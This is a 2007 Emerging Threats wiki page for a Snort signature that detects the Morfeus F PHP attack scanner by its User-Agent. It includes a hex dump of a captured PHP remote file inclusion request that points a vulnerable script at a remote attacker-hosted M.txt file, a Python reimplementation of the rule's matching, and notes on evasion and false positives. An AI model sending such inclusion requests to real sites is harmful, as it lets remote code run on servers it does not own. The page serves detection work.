Emerging Threats signature 2003466 (revision 2)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg: "BLEEDING-EDGE EXPLOIT PHP Attack Tool Morfeus F Scanner"; flow:established,to_server; content:"User-Agent\:"; nocase; pcre:"/User-Agent\:[^\n]+Morfeus\x20F/i"; reference:url,www.webmasterworld.com/search_engine_spiders/3227720.htm; classtype:web-application-attack; sid:2003466; rev:1;)

Added 2007-03-08 12:08:30 UTC

Packet captured from the scanner. The same request also fired SID 2002997 (BLEEDING-EDGE WEB PHP Remote File Inclusion, monster list http), which is the alert shown; the Morfeus User-Agent is at the end of the payload:

[**] [1:2002997:2] BLEEDING-EDGE WEB PHP Remote File Inclusion (monster list http) [**]
[Classification: Web Application Attack] [Priority: 1]
[Xref => http://www.sans.org/top20/]
Event ID: 818 Event Reference: 818
03/05/07-17:31:53.070000 209.172.33.70:52548 -> x.x.x.x:80
TCP TTL:50 TOS:0x20 ID:57259 IpLen:20 DgmLen:289 DF
***AP*** Seq: 0x44D8481D  Ack: 0xD3185DF3  Win: 0x5B4  TcpLen: 32
TCP Options (3) => NOP NOP TS: 1763284923 2818644511

47 45 54 20 2F 61 64 6D 69 6E 2F 69 6D 61 67 65  GET /admin/image
73 2E 70 68 70 3F 64 6F 6E 73 69 6D 67 5F 62 61  s.php?donsimg_ba
73 65 5F 70 61 74 68 3D 68 74 74 70 3A 2F 2F 32  se_path=http://2
30 33 2E 31 39 38 2E 36 38 2E 32 33 36 2F 7E 6C  03.198.68.236/~l
69 73 69 72 2F 4D 2E 74 78 74 3F 26 2F 20 48 54  isir/M.txt?&/ HT
54 50 2F 31 2E 31 0D 0A 41 63 63 65 70 74 3A 20  TP/1.1..Accept: 
2A 2F 2A 0D 0A 41 63 63 65 70 74 2D 4C 61 6E 67  */*..Accept-Lang
75 61 67 65 3A 20 65 6E 2D 75 73 0D 0A 41 63 63  uage: en-us..Acc
65 70 74 2D 45 6E 63 6F 64 69 6E 67 3A 20 67 7A  ept-Encoding: gz
69 70 2C 20 64 65 66 6C 61 74 65 0D 0A 55 73 65  ip, deflate..Use
72 2D 41 67 65 6E 74 3A 20 4D 6F 72 66 65 75 73  r-Agent: Morfeus
20 46 75 63 6B 69 6E 67 20 53 63 61 6E 6E 65 72   F**king Scanner
0D 0A 48 6F 73 74 3A 20 XX XX XX XX XX XX XX XX  ..Host: XXXXXXXX
XX XX XX XX XX XX 0D 0A 43 6F 6E 6E 65 63 74 69  XXXXXX..Connecti
6F 6E 3A 20 43 6C 6F 73 65 0D 0A 0D 0A           on: Close....

-- ShirkDog - 08 Mar 2007
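As an added example, not code from the original page or from the Emerging Threats rule set, the following Python reproduces the two payload options of the rule (the nocase content match and the pcre) and runs them over the captured request above plus a few constructed requests, to show what the signature does and does not fire on. The flow:established,to_server and $HTTP_PORTS conditions are assumed to have been applied before the function is called; the sample payloads other than the captured one are made up for this example.

```python
import re

# Payload options of SID 2003466, transcribed from the rule above.
# content:"User-Agent\:"; nocase;  -> case-insensitive substring
CONTENT = b"user-agent:"
# pcre:"/User-Agent\:[^\n]+Morfeus\x20F/i" -> same syntax works in Python's re
PCRE = re.compile(rb"User-Agent:[^\n]+Morfeus\x20F", re.IGNORECASE)


def matches_sid_2003466(payload: bytes) -> bool:
    """Apply the rule's payload checks to one client->server TCP payload.

    flow:established,to_server and the $HTTP_PORTS destination are stream
    and port conditions, so this assumes the caller already selected only
    client->server payloads on HTTP ports; they are not re-checked here.
    """
    # Snort evaluates the cheap content match first and only runs the pcre
    # when it hits; mirror that ordering.
    if CONTENT not in payload.lower():
        return False
    return PCRE.search(payload) is not None


# Sample payloads. CAPTURED reproduces the request in the packet above (Host
# masked as on the page); the others are constructed to probe the rule.
CAPTURED = (
    b"GET /admin/images.php?donsimg_base_path="
    b"http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1\r\n"
    b"Accept: */*\r\nAccept-Language: en-us\r\nAccept-Encoding: gzip, deflate\r\n"
    b"User-Agent: Morfeus Fucking Scanner\r\n"
    b"Host: XXXXXXXXXXXXXX\r\nConnection: Close\r\n\r\n"
)
BENIGN = (
    b"GET /index.php HTTP/1.1\r\nHost: example.com\r\n"
    b"User-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/2.0\r\n\r\n"
)
# nocase on the content and /i on the pcre: header and value case are ignored
LOWERCASE = b"GET / HTTP/1.0\r\nuser-agent: morfeus f scanner\r\n\r\n"
# [^\n]+ needs at least one byte between the colon and "Morfeus", so a
# User-Agent written without the usual space slips past the pcre
NO_SPACE = b"GET / HTTP/1.0\r\nUser-Agent:Morfeus F Scanner\r\n\r\n"
# [^\n]+ cannot cross a newline: the string must be on the User-Agent line
OTHER_HEADER = (
    b"GET / HTTP/1.0\r\nUser-Agent: curl/7.16\r\n"
    b"X-Comment: Morfeus F Scanner\r\n\r\n"
)
# The rule has no header-only restriction, so the same text in a POST body
# (say, a forum post quoting the scanner's User-Agent) also fires.
IN_BODY = (
    b"POST /forum/post.php HTTP/1.1\r\nHost: example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\nContent-Length: 44\r\n\r\n"
    b"text=saw User-Agent: Morfeus F Scanner today"
)

SAMPLES = {
    "captured": CAPTURED,
    "benign": BENIGN,
    "lowercase": LOWERCASE,
    "no_space": NO_SPACE,
    "other_header": OTHER_HEADER,
    "in_body": IN_BODY,
}


def classify(samples: dict) -> dict:
    """Return {name: alert?} for each sample payload."""
    return {name: matches_sid_2003466(p) for name, p in samples.items()}


if __name__ == "__main__":
    for name, hit in classify(SAMPLES).items():
        print(f"{name:13s} {'ALERT' if hit else '-'}")
```

Two things worth knowing before tuning this rule, both visible from the pcre itself: the `[^\n]+` requires at least one character between the colon and `Morfeus`, so a header sent as `User-Agent:Morfeus F` with no space is missed; and because the rule matches against the raw payload rather than a parsed header, the same text in a request body or query string alerts too, so a web form that echoes log excerpts can produce false positives.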


Topic revision: r2 - 2007-03-08 - ShirkDog
Copyright © Emerging Threats